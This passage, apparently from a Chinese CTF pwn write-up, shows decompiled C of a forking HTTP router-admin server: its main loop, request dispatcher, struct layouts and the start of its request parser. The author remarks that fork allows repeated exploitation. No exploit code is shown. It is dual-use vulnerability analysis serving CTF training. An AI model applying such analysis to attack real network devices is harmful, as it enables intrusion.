</span></span></span><span class="line"><span class="cl"> <span class="kt">socklen_t</span> <span class="n">addr_len</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-D0h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">fd</span><span class="p">;</span> <span class="c1">// [rsp+14h] [rbp-CCh] </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v6</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-C8h] </span></span></span><span class="line"><span class="cl"> <span class="n">__pid_t</span> <span class="n">v7</span><span class="p">;</span> <span class="c1">// [rsp+1Ch] [rbp-C4h] </span></span></span><span class="line"><span class="cl"> <span class="n">sockaddr</span> <span class="n">addr</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-C0h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="n">v9</span><span class="p">;</span> <span class="c1">// [rsp+30h] [rbp-B0h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="n">sigaction</span> <span class="n">act</span><span class="p">;</span> <span class="c1">// [rsp+40h] [rbp-A0h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v11</span><span class="p">;</span> <span class="c1">// [rsp+D8h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v11</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">optval</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">fd</span> <span class="o">=</span> <span class="nf">socket</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">fd</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">perror</span><span class="p">(</span><span class="s">&#34;Socket failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">setsockopt</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">optval</span><span class="p">,</span> <span class="mi">4u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">addr</span><span class="p">.</span><span class="n">sa_family</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">addr</span><span class="p">.</span><span class="n">sa_data</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_WORD</span> <span class="o">*</span><span class="p">)</span><span class="n">addr</span><span class="p">.</span><span class="n">sa_data</span> <span class="o">=</span> <span class="nf">htons</span><span class="p">(</span><span class="mh">0x270Fu</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="nf">bind</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">addr</span><span class="p">,</span> <span class="mh">0x10u</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">perror</span><span class="p">(</span><span class="s">&#34;Bind failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="nf">listen</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mi">256</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">perror</span><span class="p">(</span><span class="s">&#34;Listen failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">act</span><span class="p">.</span><span class="n">sa_handler</span> <span class="o">=</span> <span class="p">(</span><span class="n">__sighandler_t</span><span class="p">)</span><span class="n">errormessage</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">sigemptyset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">act</span><span class="p">.</span><span class="n">sa_mask</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">act</span><span class="p">.</span><span class="n">sa_flags</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">sigaction</span><span class="p">(</span><span class="mi">11</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">act</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">sigaction</span><span class="p">(</span><span class="mi">6</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">act</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">signal</span><span class="p">(</span><span class="mi">17</span><span class="p">,</span> <span class="p">(</span><span class="n">__sighandler_t</span><span class="p">)</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="n">format</span><span class="p">,</span> <span class="mi">9999</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">init_admin_state</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">addr_len</span> <span class="o">=</span> <span class="mi">16</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v6</span> <span class="o">=</span> <span class="nf">accept</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v9</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">addr_len</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v6</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="nf">__errno_location</span><span class="p">()</span> <span class="o">!=</span> <span class="mi">4</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">perror</span><span class="p">(</span><span class="s">&#34;accept failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="nf">fork</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v7</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">v7</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">g_client_fd</span> <span class="o">=</span> <span class="n">v6</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">type_route</span><span class="p">(</span><span class="n">v6</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">close</span><span class="p">(</span><span class="n">v6</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">close</span><span class="p">(</span><span class="n">v6</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">perror</span><span class="p">(</span><span class="s">&#34;fork failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">close</span><span class="p">(</span><span class="n">v6</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>用 fork ,可以多次利用</p> <h4 id="type_route">type_route </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="c1">// Top-level request dispatcher: allocate request_t, parse one request, then branch to GET or POST handlers based on req-&gt;method. </span></span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">type_route</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">request_t</span> <span class="o">*</span><span class="n">s</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">s</span> <span class="o">=</span> <span class="p">(</span><span class="kt">request_t</span> <span class="o">*</span><span class="p">)</span><span class="nf">malloc</span><span class="p">(</span><span class="mh">0x2A78u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">request_t</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="nf">parse_rq</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s</span><span class="o">-&gt;</span><span class="n">method</span><span class="p">,</span> <span class="s">&#34;GET&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">handle_get</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="nf">strcmp</span><span class="p">(</span><span class="n">s</span><span class="o">-&gt;</span><span class="n">method</span><span class="p">,</span> <span class="s">&#34;POST&#34;</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">handle_post</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">free</span><span class="p">(</span><span class="n">s</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>先 parse_rq 解析请求再处理</p> <h4 id="struct">struct </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="err">#</span><span class="n">pragma</span> <span class="nf">pack</span><span class="p">(</span><span class="n">push</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="k">struct</span> <span class="kt">http_header_t</span> <span class="c1">// sizeof=0x140 </span></span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00000040</span> <span class="kt">char</span> <span class="n">value</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00000140</span> <span class="p">};</span> </span></span><span class="line"><span class="cl"><span class="mo">00000140</span> <span class="err">#</span><span class="n">pragma</span> <span class="nf">pack</span><span class="p">(</span><span class="n">pop</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="err">#</span><span class="n">pragma</span> <span class="nf">pack</span><span class="p">(</span><span class="n">push</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="k">struct</span> <span class="kt">request_t</span> <span class="c1">// sizeof=0x2A78 </span></span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="kt">char</span> <span class="n">method</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00000010</span> <span class="kt">char</span> <span class="n">path</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00000110</span> <span class="kt">char</span> <span class="n">version</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00000120</span> <span class="kt">int</span> <span class="n">header_count</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="mo">00000124</span> <span class="kt">http_header_t</span> <span class="n">headers</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00002</span><span class="mi">924</span> <span class="kt">char</span> <span class="n">cookie_key</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00002</span><span class="mi">964</span> <span class="kt">char</span> <span class="n">cookie_value</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00002</span><span class="n">A64</span> <span class="kt">int</span> <span class="n">_pad</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="mo">00002</span><span class="n">A68</span> <span class="kt">char</span> <span class="o">*</span><span class="n">post_body</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="mo">00002</span><span class="n">A70</span> <span class="kt">size_t</span> <span class="n">content_length</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="mo">00002</span><span class="n">A78</span> <span class="p">};</span> </span></span><span class="line"><span class="cl"><span class="mo">00002</span><span class="n">A78</span> <span class="err">#</span><span class="n">pragma</span> <span class="nf">pack</span><span class="p">(</span><span class="n">pop</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="err">#</span><span class="n">pragma</span> <span class="nf">pack</span><span class="p">(</span><span class="n">push</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="k">struct</span> <span class="kt">post_field_t</span> <span class="c1">// sizeof=0x2010 </span></span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="kt">char</span> <span class="n">key</span><span class="p">[</span><span class="mi">4096</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00001000</span> <span class="kt">size_t</span> <span class="n">key_len</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="mo">0000100</span><span class="mi">8</span> <span class="kt">char</span> <span class="n">value</span><span class="p">[</span><span class="mi">4096</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">0000200</span><span class="mi">8</span> <span class="kt">size_t</span> <span class="n">value_len</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="mo">00002010</span> <span class="p">};</span> </span></span><span class="line"><span class="cl"><span class="mo">00002010</span> <span class="err">#</span><span class="n">pragma</span> <span class="nf">pack</span><span class="p">(</span><span class="n">pop</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="err">#</span><span class="n">pragma</span> <span class="nf">pack</span><span class="p">(</span><span class="n">push</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="k">struct</span> <span class="kt">admin_info_t</span> <span class="c1">// sizeof=0x100 </span></span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"><span class="mo">00000000</span> <span class="kt">char</span> <span class="n">username</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00000020</span> <span class="kt">char</span> <span class="n">password</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00000040</span> <span class="kt">char</span> <span class="n">token</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">000000</span><span class="mi">80</span> <span class="kt">char</span> <span class="n">route_name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">000000</span><span class="n">A0</span> <span class="kt">char</span> <span class="n">ip</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">000000</span><span class="n">C0</span> <span class="kt">char</span> <span class="n">subnet_mask</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mf">000000E0</span> <span class="kt">char</span> <span class="n">gateway</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> </span></span><span class="line"><span class="cl"><span class="mo">00000100</span> <span class="p">};</span> </span></span><span class="line"><span class="cl"><span class="mo">00000100</span> <span class="err">#</span><span class="n">pragma</span> <span class="nf">pack</span><span class="p">(</span><span class="n">pop</span><span class="p">)</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="parse_rq">parse_rq </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="c1">// Parse one HTTP request from the client socket into request_t. For POST, it copies the body once based on Content-Length. </span></span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">parse_rq</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">request_t</span> <span class="o">*</span><span class="n">req</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">haystack</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-1070h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">nptr</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-1068h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">end</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-1058h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">begin</span><span class="p">;</span> <span class="c1">// [rsp+30h] [rbp-1050h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">linend</span><span class="p">;</span> <span class="c1">// [rsp+30h] [rbp-1050h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">tip</span><span class="p">;</span> <span class="c1">// [rsp+40h] [rbp-1040h] </span></span></span><span class="line"><span class="cl"> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">s</span><span class="p">;</span> <span class="c1">// [rsp+50h] [rbp-1030h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">eq</span><span class="p">;</span> <span class="c1">// [rsp+58h] [rbp-1028h] </span></span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">tkend</span><span class="p">;</span> <span class="c1">// [rsp+68h] [rbp-1018h] </span></span></span><span class="line"><span class="cl"> <span class="n">_QWORD</span> <span class="n">buf</span><span class="p">[</span><span class="mi">513</span><span class="p">];</span> <span class="c1">// [rsp+70h] [rbp-1010h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v14</span><span class="p">;</span> <span class="c1">// [rsp+1078h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v14</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x1000u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mh">0xFFFu</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">end</span> <span class="o">=</span> <span class="nf">strstr</span><span class="p">((</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span> <span class="s">&#34;</span><span class="se">\r\n\r\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">begin</span> <span class="o">=</span> <span class="nf">strstr</span><span class="p">((</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">,</span> <span class="s">&#34;</span><span class="se">\r\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">begin</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">__isoc99_sscanf</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="s">&#34;%15s %255s %15s&#34;</span><span class="p">,</span> <span class="n">req</span><span class="p">,</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">path</span><span class="p">,</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">version</span><span class="p">);</span><span class="c1">// Head </span></span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">haystack</span> <span class="o">=</span> <span class="n">begin</span> <span class="o">+</span> <span class="mi">2</span><span class="p">;</span> <span class="n">haystack</span> <span class="o">&lt;</span> <span class="n">end</span><span class="p">;</span> <span class="n">haystack</span> <span class="o">=</span> <span class="n">linend</span> <span class="o">+</span> <span class="mi">2</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">linend</span> <span class="o">=</span> <span class="nf">strstr</span><span class="p">(</span><span class="n">haystack</span><span class="p">,</span> <span class="s">&#34;</span><span class="se">\r\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">linend</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">tip</span> <span class="o">=</span> <span class="nf">strchr</span><span class="p">(</span><span class="n">haystack</span><span class="p">,</span> <span class="sc">&#39;:&#39;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">tip</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">tip</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">nptr</span> <span class="o">=</span> <span class="n">tip</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="o">*</span><span class="n">nptr</span> <span class="o">==</span> <span class="sc">&#39; &#39;</span><span class="p">;</span> <span class="o">++</span><span class="n">nptr</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">req</span><span class="o">-&gt;</span><span class="n">header_count</span> <span class="o">&lt;=</span> <span class="mi">31</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">strncpy</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">headers</span><span class="p">[</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">header_count</span><span class="p">].</span><span class="n">name</span><span class="p">,</span> <span class="n">haystack</span><span class="p">,</span> <span class="mh">0x3Fu</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">strncpy</span><span class="p">(</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">headers</span><span class="p">[</span><span class="n">req</span><span class="o">-&gt;</span><span class="n">header_count</span><span class="p">].</span><span class="n">value</span><span class="p">,</span> <span class="n">nptr</span><span class="p">,</span> <span class="mh">0xFFu</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">++</span><span 